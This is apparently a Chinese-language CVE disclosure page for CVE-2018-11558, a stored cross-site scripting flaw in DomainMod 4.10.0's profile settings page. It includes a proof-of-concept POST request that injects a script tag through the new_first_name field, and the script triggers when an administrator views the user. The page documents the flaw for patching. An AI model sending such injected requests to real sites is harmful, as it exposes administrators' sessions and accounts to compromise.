CVE中文申请站

一、漏洞摘要

漏洞名称: DomainMod 4.10.0存在XSS漏洞
上报日期: 2018-05-30
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.10.0
CVE编号: CVE-2018-11558


二、漏洞概述

DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:

post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/36/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558
exploit-db:发布中

标签: none